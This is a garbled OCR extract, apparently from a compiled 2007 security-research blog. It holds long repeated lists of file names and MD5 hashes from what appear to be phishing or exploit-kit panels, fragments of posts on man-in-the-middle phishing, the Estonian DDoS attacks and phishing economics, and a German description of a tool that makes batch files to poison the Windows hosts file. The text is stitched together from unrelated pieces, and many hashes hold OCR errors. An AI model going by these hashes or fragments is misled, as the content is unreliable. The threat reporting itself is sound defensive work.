SHAI1: 41693e16127964b89bb9e34af8d12411323e631f 


An old friend recently approached me _ asking for my opinion on  man-in-the- 
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72b0c360b078e4b7d58840c12ec89525 


je.gif 
64dcc7081f35b7c08f4eacf253ebe3e0 
jm.gif 
b71f782c24a3caf90d61119fc2a03ade 
jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
531e4982260e50c173872d32553b9d91 
ke.gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
202b1977ecf77a413b7565ada8el26fa 
kh. gif 
10324ab7e6a04171269da2092333d4e6 
ki.gif 
3367e0e37cf04ef726ed4f31cbb255b1 
km.gif 
17361663c32c0a3571775c60f54b5861 
kn.gif 
c5a0cc06a7a96c002b2aa69C85b128a0 
kp.gif 
83172c1241cad924321c27151533316d 
kr.gif 
27b12726647e7e783763ad85fbf407c5 
kw. gif 
f58f3613420bee6129e2967e18989839 
ky. gif 
cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 
c9a29f216dc2aeb3f73f7b50b77a4b4f 
la.gif 
66ac74583c1859ea55fe34a81c73c304 
lb.gif 


6b7a372934ffc86493ae4daadaa67501 
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Ic.gif 
4ff65704775e685024c149a9b86787e0 


li.gif 
7cffdd4b033b2e5534789c0471a291ee 
Ik. gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
Ir.gif 
€2623c89857fd31be09af4f4f713b73c 
Is.gif 
bcbb085a5dff8f8e84cb04a140281745 
It. gif 
d4487bf9895cfba14176c57f966050a3 
lu.gif 
€333c2b38ad7dbec56be0ea95460al2c 
lv.gif 
514de74dc630c59838c4406dbc6f3815 
ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99F97F58b 
mc.gif 
b078930a4bc2282c3669e0af905513dd 
md.gif 
d10c62b50e2d991f4229d01613bf64ba 
me.gif 
38dbd288620c801ea083139b4eflcfc2 
mg.gif 
1fd3270525bef3c2209e0a3bcfcef238 
mh.gif 
65cb04da9b025288c09d06208b748581 
mk.gif 
8046e9ba9370efa3c5f7312000d0a608 
ml.gif 
82a7c7d6956cfaa9ec2f2b0b679d15al 
mm.gif 
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25009266f5706ef498422ad4b41b5cla 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo. gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
f7536c02354a2aa29ad117a0e317046b 
mq.gif 
31a6497822781lafecafcO8efdb911459 
mr.gif 
09c5b268ee3421d9a36330ecal8f27ed 
ms.gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt. gif 
b630e0faea7c9db87aeef9cae912d573 
mu.gif 
938ac0665ff92512fd5clle4b99eaabd 
mv.gif 
45aaaab68ef5628a951laaf7a8465c78e 
mw.gif 
2da84fc76988ed6d3d09d46d6d71d6dd 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my. gif 
809e20fabeadfa4f6dfaf629bfe32786 
mz. gif 
169b88a2d2e2b61074725cafcdb02137 
na.gif 
7879034a66005c6362f2dd6e76006903 
nc.gif 
1891dd4e9799a25058fe59c2ae6bcab6c 
ne.gif 
9f8f0b3e38b4b388cd1a876991632f25 
nf.gif 
76521b2845914c88e6ae0d70623d1fdd 
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ng.gif 
d97fe7f8986ada525dc000848a63f904 
ni.gif 
97196c326f4192d80fb0370c2eb14bd3 
nl.gif 
96199acdb50773fe45dfdbc31078ea4c 
no.gif 
d98132d9186daf717fea60b515391dbb 
np.gif 
563b2a18cc772e8152588f1593e62296 
nr.gif 
43990e2c126fd5fa663ebff4aeb7abe9 
nu. gif 
38dbd288620c801ea083139b4ef1cfc2 
nz.gif 
3156460b6b5711d6eed7f7d8cc2ab5a7 
ol.gif 
38dbd288620c801ea083139b4ef1cfc2 
om.gif 
82a30a1754878742cc4f2d53a321bb18 
pa.gif 
2cb5e6357313398ff7769acdc246d5a5 
pe. gif 
5c359dd05ae0be539b2d428c767269a3 
pf. gif 
fod8fc23d9eba2d1e25bd045bbe460a0 
pg. gif 
f8640f7168928cb4186fcOb3ffe91975 
ph.gif 
cec4d7560e2d08926359d2e87 7f3a76c 
pk.gif 
5cb1ff3e37207a760e2ecf45a5bb81d7 
pl.gif 
a929046f3f0c7781989a284371a7f43b 
pm.gif 
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82147e98807c03773c0b68356172814d 
pn.gif 
38dbd288620c801ea083139b4eficfc2 
pr.gif 
b4c3c92d6f14d845e5bd6ef808992e75 
ps.gif 
ed8543ef592caa4d4a0ca3b636d52449 
pt.gif 
ae548aa692ef71a331lafe943026e111d 
pw.gif 
6a3alfc0O91aa71fc473277a02dccdd2c 
py. gif 
479edce4532bd36f766bd29a346ee0c2 
qa.gif 
6ad5b83645bf557fe570894f453f432a 
re.gif 
61864922b44209614eae99f8a83da65c 
ro.gif 
ac04fb14afaae3bc4449a5401c3517e0 
rs.gif 
38dbd288620c801ea083139b4eficfc2 
ru.gif 
daa2a635125539998a491f04ce53dc60 
rw.gif 
87a0642d680c7ac4ae82a86c6850e80a 
sa.gif 
bbd932aea9265abf5815b74dd9446de4 
sb.gif 
C41690739c4f92af9e065e81690a2356 
sc. gif 
70b6c4f0F7bab3090a45cc9a8668e92F 
sd.gif 
aef2c6903b36e52b667bb0baa52604fc 
se.gif 
63ff75c06900689a5d43ab931bc82662 
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sg.gif 
d89f586fb81c9a9cf9cdf95013F73908 
sh.gif 
38dbd288620c801ea083139b4eflcfc2 
si.gif 
4f311a4b0a39db339be74a2f354d3799 
sj.gif 
38dbd288620c801ea083139b4eflcfc2 
sk.gif 
01d603424483cf66ca867ba0flc9fec4 
s|.gif 
a8alca018798069590c0f8cb5796fc65 
sm.gif 
6330955519623fed6262d632956c66e0 
sn.gif 
14faa28a0e44dfc2727dfe228ee84a34 
so. gif 
5d8348e7a2fal302ff6a4a3fod2bfea6 
sr.gif 
cb7f3cc497f4067d09a0d61070c937ff 
st.gif 
d0889a94d96bee4541ea661e7e3b6626 
Sv.gif 
1930fal4df40af4fd6ab9d60db7al3ed 
sy.gif 
73380e84dc753e6cfd5b3d19219024d3 
Sz. gif 
6ec7660bea2f18ffc26555f43d0f6ad8 
tc. gif 
5d456951dcf4eb341117c87857a20848 
td.gif 
c20e167cd531be6237422594b4072cd8 
tf.gif 
444a919ef49a1170cf6abf766f067054 
tg.gif 
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6aa920611047a1bc48d722a896ae9466 


th.gif 
b525712cc1014c12071aa555b29d9654 
Thumbs.db 
8580ba1le308b83c86739cd69b1cb8c75 
tj.gif 
ac1c06b195a17e9408472c15a5c086cd 
tk. gif 
38dbd288620c801ea083139b4ef1cfc2 
tl.gif 
38dbd288620c801ea083139b4eficfc2 
tm.gif 
42d945e3bce87e24a005ac96f7 79aeb7 
tn.gif 
f7d1ccddc14b1b2754f19c5eb2d51a56 
to.gif 
lee074e0dbbb595647270dbced8a8743 
tp.gif 
€668c8b8a6f7668410c90fffb7c4d8ab 
tr.gif 
23c0420906ac063753138c20bacd3ela 
tt.gif 
87decec956e1fc484b1a8b1716326b25 
tv. gif 
67e92c1c2cd1222fd607c9f91435883e 
tw.gif 
cf5c19a25cb1dd17f9d47b362d98e0a4 
tz.gif 
ef039d9935ecda27125f0fd39212ad44 
ua.gif 
1cc325bedc5df0920efedda54a184fdc 
ug.gif 
174636bd284c8d7f06638767bb84b6fd 
uk.gif 


39526cd54b55fba7910702d6a0061c90 
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um.gif 
4546517ece394c3c8a22f8b7ed54ad81 
us. gif 
a5a63b0486b82f067e8cfcbf254a989b 
uy.gif 
275a0eccdca2720e84afa23054b5d371 
uz.gif 
9bb72b0eaaee6bab1de26f9b53624a86 
va.gif 
4fccba188125599f6448f8e0b71d0677 
vc.gif 
bc56207f7daf99ac171e85c3ca85e43b 
ve. gif 
f1082562cd7ee5776e6e732cc7220889 
vg.gif 
5f89b155213d1c29181d06da33a974f8 
vi.gif 
b30d88bf20ffc5c75a254ab25b4c562c 
vn.gif 
5bf8dfaf74506f3d89aa4ab6fd9c4e211 
vu.gif 
b1924aea4986245f3c6e770e8de1b843 
wf.gif 
38dbd288620c801ea083139b4eflcfc2 
ws.gif 
a027ff7cdd02b873d271f8d5lab89ae8s 
ye.gif 
ee7fb77f702f0182de807f188138a152 
yt.gif 
38dbd288620c801ea083139b4eflcfc2 
yu. gif 
6a7e5foc9e3ac06b720eea3387477771 
za.gif 
37d219e52bce3b94891821896c71699a 
zm.gif 
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al6bced0ab9ae9b874d4c0c35c36b918 
zr.gif 
c66f4e607dbc3158243360d69856f827 
zw.gif 
8d31cf8ee73d6c4e8fdd3c8382d01549 
0.png 
7174b474d5c1b02516e0746600d0c546 
1l.png 
7394686333e998d21f9d462d6079ed21 
10.png 
d2ccb649279d017a6b050b1379489ff0 
11.png 
6437a790102cb820370ae79e1f040d8e 
12.png 
c406a4cee5bd1f34a63f3b82b99celle 
2.png 
37f5fbbcd43ae3b1b2b3e63cfele544c 
3.png 
9534784732bac3169c55f32864cc922e 
4.png 
2f2dec9e16649a09b5128586bde2e689 
5.png 
3e17c7ab5b38a7fbod5a389231bca679a 
6.png 
de7f0ae008bf6cca7bddf2a52478cf6d 
7.png 
€321983410113b6591ebe4a0835cf052 
8.png 
72f90fe46fad9e625ccfb6eaddcbd88b 
9.png 
9b1fbf932fbb637785cc36596095935c 
Thumbs.db 
5ee21a915a75cc6842c37d70b98e460f 
darkgrey.css 
71689180123a965ad2f9b2e1c8db27cd 
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footer.php 
1d3a820914ed56cbd792e581948239a6 
header.php 
e84c3ada73453dd507da394447347346 
down.php 5180ec29136cel1d9bb6e106243d04172 
inc.config.php 
b360bd7a035b86db6acceaf2b3a824e19 
index.php 
ca2c1e5783564093b6b487dd75ac8100 
localhost.sql 
8ff589e1e9742e9b5e25f196ce166a3e 
back5.png 
c2cae3a3337ac9bal281f7f29c4aef37 

change _pass.php 
1e296cdf1f7581873c548958b1010249 

clear _db.php 
1bf1b94db07ec65f3cOfb8a5ec89fdeb 
games.png 
9f0f466b5cc633d5c8ed8556bde03c0a 

help.php bdf29e20be538f3579ad57008167 7abf 
index.php 
bb0e666208c0cad4d38c397b3817d5a5 

ip _stat.php 
a7a907652eab704c5b7b17b4f3e2283e 
lang.php 06688d2699979d6a12c67ff4e8a42475 
login.php 
a29788a22a1b4780a5aa9bef63ec8c0d 
logo.png 5502629e73f53daa95a00fcd8fd8bc64 
logout.php 
494d94a6881536345d08fle0178fa2ca 
main.png 2d005c2b641c1b533f4bede89a01e5fa 
Thumbs.db 
081a204fd78e499568583d4e5a5f591b 

top.jpg 

69342599c1b191609362882c2f8dd 7 9F 
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Dieses Programm erstellt bat-Dateien, welche die 
hostfile infizieren. 

Eine auf diese Weise manipulierte hostfile leitet den 
Zuariff auf websites um. 

Die hostfile wird in "%windir%\system32\drivers\etc" 
erstellt. 

Um die "'Sperre" aufzuheben, einfach die hastfile 
loschen 

mit freundlichen griihen, Opae 18.06.2007 


9 t 


Ip der Phishing Site 


middle phishing attacks, and whether or not I’m aware of any such DIY type of functions. 
Simultaneously, PandaSecurity released a[4] very good screenshot of a feature within a 
botnet’s C &C interface, worth seeing for yourself too. Despite that the current [5]"push" 
phishing model seems to be fully working, and keylogging started evolving into "[6]form 
grabbing", MITM phishing attacks | think would remain at the bottom of the attack model for 
the pragmatic and efficiency-centered phisher,who would otherwise have to either build a 
botnet on her own, or request access to such on demand. 


. http: //en. wikipedia. org/wiki/Pharming 


. http: //ddanchev. blogspot .com/2007/08/pharming-attacks-through-dns- cache .htm 


. http: //ddanchev. blogspot .com/2005/12/ip-cloaking-and-competitive.htm 


1 
2 
3 
4, http://bloge. pandasot tware .con/blogs/images/PandaLabs/2007/08/21/configurer.Jpd 
5 
6 


. http: //ddanchev. blogspot .com/2007/07/average-online-time-for-phishing-sites.htm 


. http: //ddanchev. blogspot .com/2006/11/nuclear-grabber-toolkit .htm 
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topr.png 88c92b7b329916bae8a38557c3c5efad 
user manager.php 
72e29c577686d944bc4d618eadd68ce7 
ad.gif 
b6b1e9619ed7289fba573e8d889d3819 
ae. gif 
b42e6f37ba2e059876e9cad6c8afbd98 
af.gif 
ccaf2f8cd19e558d2cb925e37b120f20 
ag.gif 
f60877160a45fe086b5943d487144b23 
ai.gif 
e9f155a292785d401d472c25a2735f39 
al.gif 
2379c017b4858d90f900b3564a88b72e 
am.gif 
6a2e3d4ac7139f1665ec85daf905c4fb 
an.gif 
3felba098d2bd5f85c996ea0a5d7dd5a 
ao.gif 
3a30af9a98cf20e6619eeE234e8c7f929 
aq.gif 
23507525ab4e7d1023a3a6940790d9c6 
ar.gif 
2940a84a15b26e5ee37fa29a89947228 
as.gif 
e56e28dec792c71b32cb7299ebd83751 
at.gif 
cadc74036384cda59ee91d99bdcfdd69 
au.gif 
b91b6739c8107e29680568ef8ff952f9 
aw.gif 
8e91812abcd372b3a32e7c16c15dd8ed 
az.gif 
64c82a7cafccd37a526f7745b915b8aa 
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ba.gif 
1c8a23d4d9ed0f8decf5eea261e631b5 


bb. gif 
ae7aadd035a40e5026a777e2ecdbd5f5 
bd.gif 
5349673c83420f65faac21f9ee14a7d2 
be.gif 
€2697c0d2f33f4c8ca85dac762734cfc 
bf. gif 
d10e907a9fb8487940f6c5d350dde6ae 
bg. gif 

f6e51fba28e2744b67 8ffd752d75f945 
bh. gif 
b8aeb3f5a24a277ea6c826cd4113e2ee 
bi.gif 
fe5f4500cf4baefld65a424e8d5689bc 
bj.gif 
97af4afce5fd166559201493f6848c47 
bm.gif 
06045f155dd3b1d22cd28b86e57de479 
bn.gif 
43948655b170b8e063f023620d97c76b 
bo.gif 
9c4ef78c1b8051c0038227e04705c871 
br.gif 
667c1c786e5365ealff2c5lbaed8e6a7 
bs. gif 
1bc0alb6cf00a50bb9bf3588d84b321¢c 
bt.gif 

995226c86da889b7 7ee9fa9c60bee399 
bv. gif 
e023614ca4df2ed1be0dacf9f736826a 
bw. gif 
d4232256a8374cff569021c5351301be 
by.gif 
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23f79b7553f5cdcc90f3bcelf7feld0c 


bz.gif 
2ab46e28a4d3084d7620e0aaecf4c235 
ca.gif 
c1c24f48ac653bf3f07423fd1i2ecd11f 
cd.gif 
b74241ecd992051a41c456f3e6ec2ad3 
cf.gif 
fdd15d7a37c8e885b731d6f7c8c67dc6 
cg.gif 
62a3129d39d66d648580fbeef1lfce60f 
ch.gif 
a9aa4db50f1d232d494610110455e98d 
ci.gif 
0f8d3618f8a62d914f0f792a83c2c687 
ck. gif 
edafceaaf10f5f387523fd27915628e7 
cl.gif 

65341 ffddf87323b55fdff8bb115bc75 
cm.gif 
1bb0670559a2676fd42dfdef3a7b1b/7f 
cn.gif 
12a79273092a0a93adbfe9b685634e5f 
co.gif 
966dc7ed9306794734a2e61438f89744 
cr.gif 
c5fa3319590501d12afd4e16b4ed81b0 
cu.gif 
a40b55eeca54fe5605f06d194b179d3a 
cv.gif 
d26c9fc27103d723586ba616057460dd 
cy.gif 
d8dd4cfcd2570984219c9826d417ee9a 
cz.gif 


3c706c7f9d3bb30ae2df290c8a9be3e7 
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de.gif 
1f31389417402bf187e3276579adcfcl 


dj.gif 
c7bf7379f87e9aac8c045ed3bf58da23 
dk.gif 
8337faebf55a6e5b297aff95517147a9 
dm.gif 
6f33e31ac969168d9431cc865001a21a 
do.gif 
d50d679037a133f49533abd436aac790 
dz.gif 
fd8b3e3a882012c111c387b4a24c201b 
ec. gif 
6d213134a8af6250fe5b269d16b52967 
ee. gif 
3e3f7d30e9e58b2c98f6f5d7f7be1l64c 
eg.gif 
9600de10fc4779b7873d463e4a5188e9 
er.gif 
238dde43e7077fade86597999e6046c2 
es. gif 
4fc4c91dbb8012db776af9b476c4elcd 
et. gif 
737dc12da78a0b27b999544a41b8c954 
eu. gif 
6a257a89ee638d66865664ee968ff7 2c 
fi.gif 
Oaae04dbd30720f6bd155ce7840910e3 
fj.gif 
a825cdf6cdc75877a2748201e0d14874 
fk.gif 
a2d83821d143ce2c35e48c9e9ef021e4 
fm.gif 
5cbe429c604ede636f93f9e3e65d2d3e 
fo. gif 
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adc678b55e16ee1c8e4363e1fd764086 
fr.gif 
7f66797472eb9360e0bd22bfcfb9delf 
ga.gif 
96de40e3362ec03980171a6b347755e4 
gb.gif 
93cb87bcf85c3b2756f6b296494cbc37 
gd.gif 
83810a8a9a36dfla42a7e2df644b07e2 
ge.gif 
ac87f86413d9e214be3de0d3820cfla7 
gh.gif 
6e506c781480alef5eb80a5f415c300a 
gi.gif 
26f676e5676155claal278e3c0e2ede6 
gl.gif 
220ba9d5444b958512cf8c14e6f3664d 
gm.gif 
6b71edef56d177266bd076cda58def7e 
gn.gif 
c07acd5a538c11ec4933de155b5341a2 
gp.gif 
d12f295c5396a57c3ca27de5e46b1f94 
gq.gif 
303063fca23a70f425dc923ce3f34b30 
gr.gif 
cee23846c8603623882ed5134406806c 
gt.gif 
9b5e92154496a88f1cal0648454977af 
gu.gif 
d8ee6ee605a30ddadafb179000fle62b 
gw.gif 
7008cdb584b4983fbf7458de392f3b82 
gy. gif 
e0745abf42d852da0588adeab822c002 
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hk.gif 
83301f5dfebf29cd5aca49a6272240c8 
hm.gif 
3a24264185daf6e8c307d523a544e5ac 
hn.gif 
99b20f53c38c2f36de5677946e7cb042 
hr.gif 
39cac2f2e2e6a9f41f89026442287682 
ht. gif 
99b88b35b9310162500f187da64b579e 
hu. gif 
3212a65eba5018fdee554234c45fb5ff 
id.gif 
a3fe271b1dec3d96fd3cebce6591c840 
ie.gif 
d0101b97df3644ac8ef40780ca5cdf8b 
il.gif 
ce092caal539ae185ae407fbc543cd5c 
im.gif 
31a602ae1723a9e5bfffc3304c15287e 
in.gif 
3f042¢528c4bf957777be35f6b18c691 
io.gif 
35b9c8f05cObce96ae295cd97997bb43 
iq.gif 
43a114c7298e15308378fe959f94f3ed 
ir.gif 
2a8da57126b658e256ce5b93c6949b83 
is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it.gif 
72b0c360b078e4b7d58840c12ec89525 
je.gif 
64dcc7081f35b7c08f4eacf253ebe3e0 
jm.gif 
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b71f782c24a3caf90d61119fc2a03ade 


jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
531e4982260e50c173872d32553b9d91 
ke.gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
202b1977ecf77a413b7565ada8el26fa 
kh. gif 
10324ab7e6a04171269da2092333d4e6 
ki.gif 
3367e0e37cf04ef726ed4f31cbb255b1 
km.gif 
17361663c32c0a3571775c60f54b5861 
kn.gif 
c5a0cc06a7a96c002b2aa69C85b128a0 
kp.gif 
83172c1241cad924321c27151533316d 
kr.gif 
27b12726647e7e783763ad85fbf407c5 
kw. gif 
f58f3613420bee6129e2967e18989839 
ky. gif 
cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 
c9a29f216dc2aeb3f73f7b50b77a4b4f 
la.gif 
66ac74583c1859ea55fe34a81c73c304 
lb.gif 
6b7a372934ffc86493ae4daadaa67501 
Ic.gif 
4ff65704775e685024c149a9b86787e0 
li. gif 


7cffdd4b033b2e5534789c0471a291ee 
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Ik. gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
Ir.gif 

€2623c8985 7fd31be09af4f4f713b73c 
Is.gif 
bcbb085a5dff8f8e84cb04a140281745 
It. gif 
d4487bf9895cfbal4176c57f966050a3 
lu.gif 
€333c2b38ad7dbec56be0ea95460al2c 
lv.gif 

ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99F97F58b 
mc.gif 
b078930a4bc2282c3669e0af905513dd 
md.gif 
d10c62b50e2d991f4229d01613bf64ba 
mg.gif 
1fd3270525bef3c2209e0a3bcfcef238 
mh.gif 
65cb04da9b025288c09d06208b748581 
mk.gif 
8046e9ba9370efa3c5f7312000d0a608 
ml.gif 
82a7c7d6956cfaa9ec2f2b0b679d15al 
mm.gif 
25009266f5706ef498422ad4b41b5cla 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo.gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
f7536c02354a2aa29ad117a0e317046b 
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mq.gif 
31a6497822781lafecafcO8efdb911459 


mr.gif 
09c5b268ee3421d9a36330ecal8f27ed 
ms.gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt. gif 
b630e0faea7c9db87aeef9cae912d573 
mu.gif 
938ac0665ff92512fd5clle4b99eaabd 
mv.gif 
45aaaab68ef5628a951laaf7a8465c78e 
mw. gif 
2da84fc76988ed6d3d09d46d6d71d6dd 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my.gif 
809e20fabeadfa4f6dfaf629bfe32786 
mz.gif 
169b88a2d2e2b61074725cafcdb02137 
na.gif 
7879034a66005c6362f2dd6e76006903 
nc.gif 
1891dd4e9799a25058fe59c2ae6bcab6c 
ne.gif 
9f8f0b3e38b4b388cd1a876991632f25 
nf.gif 
76521b2845914c88e6ae0d70623d1fdd 
ng.gif 
d97fe7f8986ada525dc000848a63f904 
ni.gif 
97196c326f4192d80fb0370c2eb14bd3 
nl.gif 


96199acdb507 73fe45dfdbc31078ea4c 
no.gif 
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d98132d9186daf717fea60b515391dbb 
np. gif 
563b2a18cc772e8152588f1593e62296 
nr.gif 
43990e2c126fd5fa663ebff4aeb7abe9 
nz.gif 
3156460b6b5711d6eed7f7d8cc2ab5a7 
om.gif 
82a30a1754878742cc4f2d53a321bb18 
pa.gif 
2cb5e6357313398ff7769acdc246d5a5 
pe.gif 
5c359dd05ae0be539b2d428c767269a3 
pf. gif 
fod8fc23d9eba2d1e25bd045bbe460a0 
pg.gif 
f8640f7168928cb4186fcOb3ffe91975 
ph.gif 
cec4d7560e2d08926359d2e87 7f3a76c 
pk.gif 
5cb1ff3e37207a760e2ecf45a5bb81d7 
pl.gif 
a929046f3f0c7781989a284371a7f43b 
pm.gif 
82147e98807c03773c0b68356172814d 
pr.gif 
b4c3c92d6f14d845e5bd6ef808992e75 
ps. gif 
ed8543ef592caa4d4a0ca3b636d52449 
pt.gif 
ae548aa692ef71a331afe943026e111d 
pw. gif 
6a3alfc091aa71fc473277a02dccdd2c 
py.gif 
479edce4532bd36f766bd29a346ee0c2 
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3.8.19 Your Point of View - Requested! (2007-08-26 21:06) 


We've seen 128 unique DDoS attacks on Estonian websites in the past two weeks 
ee wee tet these, 115 were ICMP floods, 4 were TCP SYN floods, and 9 were 
Peers Attacks were not distributed uniformly, with some sites seeing 
more attacks than others: 


Attacks Destination Address or owner 


D 
(D 


6 184.49,.194/32" www. agri.ee 

4 32 

_ W942 4984 EN KQ/25" Www.fin.ee (Ministry of 
ote 213.184, 50.69/32 Finance) 

1 62.65.192.24/32" 


Question : What is the most realistic scenario on what exactly happened in the recent DDoS 
attacks aimed at Estonia, from your point of view? 


- It was a Russian government-sponsored hacktivism, or shall we say a government-tolerated 
one 


- Too much media hype over a sustained ICMP flood, given the publicly obtained statis- 
tics of the network traffic 


- Certain individuals of the collectivist Russian society, botnet masters for instance, were 
automatically recruited based on a nationalism sentiments so that they basically forwarded 
some of their bandwidth to key web servers 


- In order to generate more noise, DIY DoS tools were distributed to the masses so that 
no one would ever know who’s really behind the attacks 


- Don’t know who did it, but | can assure you my kid was playing !synflood at that time 


- Offended by the not so well coordinated removal of the Soviet statue, Russian oligarchs 
felt the need to send back a signal but naturally lacking any DDoS capabilities, basically 
outsourced the DDoS attacks 


- A foreign intelligence agency twisting the reality and engineering cyber warfare ten- 
sions did it, while taking advantage of the momentum and the overall public perception that 
noone else but the affected Russia could be behind the attacks 


- | hate scenario building, reminds me of my academic years, however, yours are pretty 
1019 


qa.gif 
6ad5b83645bf557fe570894f453f432a 
re.gif 
61864922b44209614eae99f8a83da65c 
ro.gif 
ac04fb14afaae3bc4449a5401c3517e0 
ru.gif 
daa2a635125539998a491f04ce53dc60 
rw.gif 
87a0642d680c7ac4ae82a86c6850e80a 
sa.gif 
bbd932aea9265abf5815b74dd9446de4 
sb.gif 
C41690739c4f92af9e065e81690a2356 
sc.gif 
70b6c4f0F7bab3090a45cc9a8668e92F 
sd.gif 
aef2c6903b36e52b667bb0baa52604fc 
se.gif 
63ff75c06900689a5d43ab931bc82662 
sg.gif 
d89f586fb81c9a9cf9cdf95013f73908 
si.gif 

4f311a4b0a39db339be7 4a2f354d3799 
sk.gif 
01d603424483cf66ca867ba0flc9fec4 
SI.gif 
a8alca018798069590c0f8cb5796fc65 
sm.gif 
6330955519623fed6262d632956c66e0 
sn.gif 
14faa28a0e44dfc2727dfe228ee84a34 
so.gif 
5d8348e7a2fal302ff6a4a3fod2bfea6 
sr.gif 
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cb7f3cc497f4067d09a0d61070c937ff 


st.gif 
d0889a94d96bee4541ea661e7e3b6626 
sv.gif 
1930fal4df40af4fd6ab9d60db7al3ed 
sy.gif 
73380e84dc753e6cfd5b3d19219024d3 
Sz.gif 
6ec7660bea2f18ffc26555f43d0f6ad8 
tc. gif 
5d456951dcf4eb341117c87857a20848 
td.gif 
c20e167cd531be6237422594b4072cd8 
tf.gif 
444a919ef49a1170cf6abf766f067054 
tg.gif 
6aa920611047a1bc48d722a896ae9466 
th. gif 


b525712cc1014c12071aa555b29d9654 
Thumbs.db 
4abe149f0460897dbd1bb2ae37753d3f 
tj.gif 
ac1c06b195a17e9408472c15a5c086cd 
tm.gif 
42d945e3bce87e24a005ac96f7 79aeb7 
tn.gif 
f7d1ccddc14b1b2754f19c5eb2d51a56 
to.gif 
lee074e0dbbb595647270dbced8a8743 
tp. gif 
e668c8b8ab6f7668410c90fffb7c4d8ab 
tr.gif 
23c0420906ac063753138c20bacd3ela 
tt. gif 
87decec956e1fc484b1a8b1716326b25 
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tv. gif 
67e92c1c2cd1222fd607c9f91435883e 
tw.gif 
cf5c19a25cb1dd17f9d47b362d98e0a4 
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good which doesn’t necessarily mean | actually care who did it, and pssst - it’s not cyberwar, 
as in cyberwar you have two parties with virtual engagement points, in this case it was 
bandwidth domination by whoever did it over the other. A virtual shock and awe 


- | stopped following the news story by the time every reporter dubbed it the first cyber 
war, and started following it again when the word hacktivism started gaining popularity. So, 
hacktivists did it to virtually state their political preferences 


[1]Voting link - your opinion is greatly appreciated. 


[2]Stats courtesy of Arbor Networks’ [3]ATLAS, among the several [4]early warning secu- 
rity event systems publicly available online. 


http: //www.imedialearn.com/imediapoll/poll . php? code=f1156c39d3c972139c62bc91c17e2c5 


ttp://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a-summary-to-date/ 


1. 
2. 
3. 
4. 


http: //ddanchev. blogspot .com/2007/06/early-warning-security-event-systems.htm 


3.8.20 The Economics of Phishing (2007-08-28 12:42) 
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computer exploitation scam page desinn email harvesting 
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root lists | pkening 
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attack 
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crodeatial collection tracking alvorthms tracking bardvware 


Years ago, phishing used to be like fishing at least in respect to the preparation and the 
patience required for the fisherman to catch something. Nowadays, [1]phishing is like fishing 
with dynamite, very effective and entirely efficiency centered. After discussing [2]the eco- 
nomics of spamming - within the posts’s comments - | emphasized on the fact that both the 
[3]underground’s economy supply of goods and the [4]phishing ecosystem, are entirely based 
on the cooperating among spammers, phishers and malware authors, and so is the rise of the 
[5]DIY phishing kits. | recently came across a very good analysis conducted by Cloudmark 
with a huge sample of phishing emails to draw conclusions out of. [6]The Economy of Phishing 
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printf. pdf 
2ba729f130f61bcae55db34361c99073 
s.gif 
df3e567d6f16d040326c7a0ea29a4f41 
U.asx 
2bcf976be39cee4f154e01f8ffb3a264 
vistaie7.html 
21801628a6ddc02829f15f7e64ccb2e6 
vistaie8.html 
579a76b70fObf806deb0e2ea4228cdf7 
vistaother.html 
11301lad4e8b9f846bf145a030719belf 
win7ie.html 
aef4a9881b01bb57f7a9a1269ca12396 
win7other.html 
df9d6f09c3799dfea2f6a89d4af65070 
xpie7.html 
5b3ebb8356885da38df633f0404df625 
xpie8.html 
f82c¢7d3635773114ab55b57ec867ed43 
xpother.html 
8e7d4336576638b68fd9e4c542cd979Cc 
get.php 
21b8e8a90998cbc1f55a532adeaf4659 
inc.config.php 
c59999c2dc17a0d2c3a07c3b97dc1d0d 
index.php 
60630164282f0746fa691846dd5743d6 
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mysqldb.sql 
9ee3507cb60e4b60c4bd313032e33851 
change _pass.php 
62bb8b56d3c1cd195963022fef5caea4 
clear _db.php 
d9101271f0e4093d1970515857090279 
help.php Ob0aaf130c642275fa324606c840ced0 
index.php 
2fc516d3856ee0116250781fc0a79dfb 
ip _stat.php 
40e241c3a2f59aad03753f5445a41911 
lang.php 99928aece6d41c447aa98b666c5ab6fd1 
login.php 
1948fac64fdcc387b8fccdd231d06d8f 
logout.php 
621b0fd4737d48378de7e142e5a09ee0 
user _manager.php 
3c455e714fbd7c8148d6247810f5360a 
ad.gif 
b6b1e9619ed7289fba573e8d889d3819 
ae.gif 
b42e6f37ba2e059876e9cad6c8afbd98 
af. gif 
ccaf2f8cd19e558d2cb925e37b120f20 
ag. gif 
f60877160a45fe086b5943d487144b23 
ai.gif 
e9f155a292785d401d472c25a2735f39 
al.gif 
2379c017b4858d90f900b3564a88b72e 
am.gif 
6a2e3d4ac7139f1665ec85daf905c4fb 
an.gif 
3felba098d2bd5f85c996ea0a5d7dd5a 
ao.gif 
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3a30af9a98cf20e6619eeE234e8c7f929 
aq.gif 
23507525ab4e7d1023a3a6940790d9c6 
ar.gif 
2940a84a15b26e5ee37fa29a89947228 
as.gif 
e56e28dec792c71b32cb7299ebd83751 
at.gif 
cadc74036384cda59ee91d99bdcfdd69 
au.gif 
b91b6739c8107e29680568ef8ff952f9 
aw.gif 
8e91812abcd372b3a32e7c16c15dd8ed 
az.gif 
64c82a7cafccd37a526f7745b915b8aa 
ba.gif 
1c8a23d4d9ed0f8decf5eea261e631b5 
bb.gif 
ae7aadd035a40e5026a777e2ecdbd5f5 
bd.gif 
